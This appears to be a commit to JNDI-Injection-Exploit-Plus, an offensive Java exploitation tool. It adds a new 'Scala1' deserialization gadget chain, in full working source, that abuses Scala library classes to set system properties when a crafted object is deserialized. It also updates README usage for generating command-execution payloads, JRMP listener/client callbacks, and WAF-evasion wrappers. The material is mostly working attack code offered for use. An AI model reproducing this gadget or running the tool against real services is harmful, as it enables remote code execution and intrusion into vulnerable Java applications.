add chain scala1

Author: cckuailong

README.md

@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 74)
+#### 3. Deserailization Gadget (total: 75)
 
 P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
@@ -97,6 +97,7 @@ Myfaces1            |@mbechler|
 Myfaces2            |@mbechler|
 ROME1               |@mbechler                   |rome:1.0
 ROME2 :arrow_up:               |@firebasky                  |rome:1.0
+Scala1 :arrow_up:               |@jarij                  |org.scala-lang:scala-library:2.13.x
 Spring1             |@frohoff                    |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
 Spring2             |@mbechler                   |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
 Spring3 :arrow_up:             |@cckuailong                 |spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2
@@ -137,7 +138,7 @@ Dirty | Insert a lot of dirty data to bypass WAF
 - Example
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
@@ -149,15 +150,15 @@ Hide class name to bypass WAF.
 - Example
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F
 ```
 
 Reference: [https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html)
 
 #### Web service to return Deserial Gadgets
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar
 ```
 
 ```shell
@@ -177,7 +178,7 @@ P.S. Param wrapper & output is opetional
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -207,7 +208,7 @@ Points for attention:
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
 ```
 
 where:
@@ -225,13 +226,13 @@ where:
 - JRMPListener
 
 ```shell
-java -cp JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 ## Examples
@@ -243,7 +244,7 @@ Local demo:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -274,7 +275,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
 ### Deserialization Payloads
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 Base64 Output Result:

README_zh.md

@@ -12,14 +12,14 @@ JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目
 
 - 远程Reference链 （3种）
 - 本地Reference链 （4种）
-- 反序列化链（74种）
+- 反序列化链（75种）
 
 P.S. 具体利用链名称及依赖见 [表格](./README.md)
 
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 #### 参数说明
@@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A]
 1. 运行工具
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
 ```
 
 ![](./img/1.png)
@@ -64,7 +64,7 @@ class Test{
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
 ```
 
 #### 参数说明
@@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D]
 1. 普通
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 ![](./img/3.png)
@@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applica
 
 - JRMPListener
 ```
-java -cp JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 ```
-java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 #### 提供反序列化包装器
@@ -114,7 +114,7 @@ Dirty | 插入大量脏数据来绕过WAF检测
 - 示例
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
@@ -126,15 +126,15 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calcula
 - Example
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F
+$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F
 ```
 
 参考链接：[https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html)
 
 #### 可以返回反序列化数据的web服务
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar
 ```
 
 ```shell

pom.xml

@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>2.4-SNAPSHOT</version>
+    <version>2.5-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -260,6 +260,12 @@
             <version>26.0.1.Final</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.scala-lang</groupId>
+            <artifactId>scala-library</artifactId>
+            <version>2.13.6</version>
+        </dependency>
+
         <dependency>
             <groupId>org.springframework</groupId>
             <artifactId>spring-tx</artifactId>

src/main/java/payloads/Scala1.java

@@ -0,0 +1,83 @@
+package payloads;
+
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import scala.Tuple2;
+import sun.reflect.ReflectionFactory;
+import util.PayloadRunner;
+import util.StubClassConstructor;
+
+import java.io.*;
+import java.lang.invoke.MethodHandleInfo;
+import java.lang.invoke.SerializedLambda;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.util.concurrent.ConcurrentSkipListMap;
+
+
+@SuppressWarnings({"rawtypes"})
+@Dependencies({"org.scala-lang:scala-library:2.13.6"})
+@Authors({ Authors.JARIJ })
+public class Scala1 extends PayloadRunner implements ObjectPayload<Object> {
+
+	public Object getObject(final String command) throws Exception {
+		String[] nameValue = command.split(":");
+		String key = nameValue[0];
+		String value = nameValue[1];
+
+		ReflectionFactory rf =
+				ReflectionFactory.getReflectionFactory();
+
+		Tuple2 prop = new scala.Tuple2<>(key, value);
+
+		// Should be: 142951686315914362
+		long versionUID = ObjectStreamClass.lookup(scala.Tuple2.class).getSerialVersionUID();
+//		System.out.println("VersionUID: " + versionUID);
+
+		SerializedLambda lambdaSetSystemProperty = new SerializedLambda(scala.sys.SystemProperties.class,
+				"scala/Function0", "apply", "()Ljava/lang/Object;",
+				MethodHandleInfo.REF_invokeStatic, "scala.sys.SystemProperties",
+				"$anonfun$addOne$1", "(Lscala/Tuple2;)Ljava/lang/String;",
+				"()Lscala/sys/SystemProperties;", new Object[]{prop});
+
+		Class<?> clazz = Class.forName("scala.collection.View$Fill");
+		Constructor<?> ctor = clazz.getConstructor(int.class, scala.Function0.class);
+		Object view = ctor.newInstance(1, createFuncFromSerializedLambda(lambdaSetSystemProperty));
+
+		clazz = Class.forName("scala.math.Ordering$IterableOrdering");
+		ctor = rf.newConstructorForSerialization(
+				clazz, StubClassConstructor.class.getDeclaredConstructor()
+		);
+
+		Object iterableOrdering = ctor.newInstance();
+
+		// on readObject, ConcurrentSkipListMap invokes comparator.compare(Object x, Object y);
+		// Initialize ConcurrentSkipList with a dummy comparator (a comparator that allows putting values into the list)
+		ConcurrentSkipListMap map = new ConcurrentSkipListMap((o1, o2) -> 1);
+
+		// add the view entry to the map, when the view.iterable().next() is invoked, the System.setProperty lambda is executed
+		map.put(view, 1);
+		map.put(view, 2);
+
+		// Replace the comparator with the IterableComparator
+		// IterableComparator is responsible for executing the view.iterable().next() on comparison
+		Field f = map.getClass().getDeclaredField("comparator");
+		f.setAccessible(true);
+		f.set(map, iterableOrdering);
+
+		return map;
+	}
+
+	private static Object createFuncFromSerializedLambda(SerializedLambda serialized) throws IOException, ClassNotFoundException {
+		ByteArrayOutputStream baos = new ByteArrayOutputStream();
+		ObjectOutputStream oos = new ObjectOutputStream(baos);
+		oos.writeObject(serialized);
+
+		ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
+		return ois.readObject();
+	}
+
+	public static byte[] getBytes (final String command, Boolean fusion) throws Exception {
+		return PayloadRunner.run(Scala1.class, command,fusion);
+	}
+}

src/main/java/payloads/annotation/Authors.java

@@ -30,6 +30,7 @@
     String CCKUAILONG = "cckuailong";
     String YULEGEYU = "yulegeyu";
     String Y4ER = "y4er";
+    String JARIJ = "jarij";
 
     String[] value() default {};
 

src/main/java/util/StubClassConstructor.java

@@ -0,0 +1,6 @@
+package util;
+
+public class StubClassConstructor {
+    public StubClassConstructor() {
+    }
+}